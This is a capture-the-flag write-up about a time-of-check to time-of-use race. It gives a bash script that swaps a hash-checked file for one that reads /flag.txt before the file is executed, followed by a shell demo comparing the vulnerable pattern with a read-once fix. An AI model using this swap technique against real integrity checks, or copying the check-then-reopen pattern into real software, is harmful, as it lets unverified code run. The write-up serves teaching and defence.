Hack the Jail - Part 2
Difficulty
Hard.
How To solve
The key insight of this challenge is that the file is opened twice: once to check whether its MD5 sum matches the expected value, and a second time to actually execute it. Anything that replaces the file between those two opens is executed without ever having been checked.
This type of vulnerability is called "Time-of-check to time-of-use", or TOCTTOU for short. The challenge contains an artificially long delay between the check and the use so that the race is easy to win.
The script below performs the actual attack:
#!/bin/bash
# run the vulnerable program in the background
./execute &
# make sure that the check has been performed
sleep 1
# then replace the program with our malicious program
mv hello_world.sh hello_world.sh.old
cp read.sh hello_world.sh
# wait until the "execute" program has finished.
sleep 8
# clean up
rm hello_world.sh
mv hello_world.sh.old hello_world.sh
The contents of the read.sh file are as follows:
#!/bin/bash
cat /flag.txt
Both files need to have executable permissions, which can be obtained using chmod +x *.sh.
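The fix for this class of bug is to never touch the path a second time: read the file once, hash the bytes you read, and execute exactly those bytes. The following POSIX shell script is an added example and is not part of the challenge or its execute binary. It puts the two-open pattern next to a read-once version and replaces the challenge's sleep with a "window" command that performs the same mv/cp swap, so the outcome is deterministic rather than a race. The file names hello_world.sh and read.sh mirror the writeup; the function names, the scratch directory and the sample scripts are constructed for the example, and md5sum is assumed to be GNU coreutils.

```shell
#!/bin/sh
# Added example, not the challenge's code. Compares the vulnerable
# check-path-then-run-path pattern with a read-once version.

# Hash exactly the bytes given. Command substitution strips trailing
# newlines, so the expected value must be computed the same way.
md5_of_string() {
    printf '%s' "$1" | md5sum | cut -d' ' -f1
}

# Vulnerable pattern (the challenge's bug): the file is opened once for the
# hash check and again for execution. "$window" stands in for the delay
# during which the attacker swaps the file.
vulnerable_run() {
    path="$1"; expected="$2"; window="$3"
    actual=$(md5_of_string "$(cat "$path")")
    [ "$actual" = "$expected" ] || { echo "hash mismatch"; return 1; }
    sh -c "$window"          # swap happens here
    sh "$path"               # second open: runs whatever is on disk now
}

# Hardened pattern: read once, hash the in-memory copy, execute that copy.
# After the read the path is never consulted again, so a swap is harmless.
hardened_run() {
    path="$1"; expected="$2"; window="$3"
    content=$(cat "$path")
    actual=$(md5_of_string "$content")
    [ "$actual" = "$expected" ] || { echo "hash mismatch"; return 1; }
    sh -c "$window"          # same swap, now too late to matter
    sh -c "$content"         # runs the bytes that were checked
}

# Constructed sample scripts in a scratch directory (not the real challenge files).
setup_demo() {
    dir=$(mktemp -d)
    printf '#!/bin/sh\necho ORIGINAL\n' > "$dir/hello_world.sh"
    printf '#!/bin/sh\necho SWAPPED\n'  > "$dir/read.sh"
    echo "$dir"
}

# The swap from the writeup, as a single command string run inside the window.
swap_cmd() {
    printf "mv '%s/hello_world.sh' '%s/hello_world.sh.old' && cp '%s/read.sh' '%s/hello_world.sh'" \
        "$1" "$1" "$1" "$1"
}

demo_vulnerable() {
    dir=$(setup_demo)
    expected=$(md5_of_string "$(cat "$dir/hello_world.sh")")
    result=$(vulnerable_run "$dir/hello_world.sh" "$expected" "$(swap_cmd "$dir")")
    rm -rf "$dir"
    echo "$result"           # SWAPPED: the checked file was not the executed file
}

demo_hardened() {
    dir=$(setup_demo)
    expected=$(md5_of_string "$(cat "$dir/hello_world.sh")")
    result=$(hardened_run "$dir/hello_world.sh" "$expected" "$(swap_cmd "$dir")")
    rm -rf "$dir"
    echo "$result"           # ORIGINAL: the swap no longer influences execution
}

echo "two opens   -> $(demo_vulnerable)"
echo "read once   -> $(demo_hardened)"
```

The same idea applies to a compiled checker: keep the descriptor from the first open and execute it with fexecve (or hash and run from that descriptor) instead of reopening by name. The writeup's swap works by renaming the original and copying a new file into place, which creates a new directory entry and a new inode; an already-open descriptor still refers to the original inode, so the checked content and the executed content stay the same.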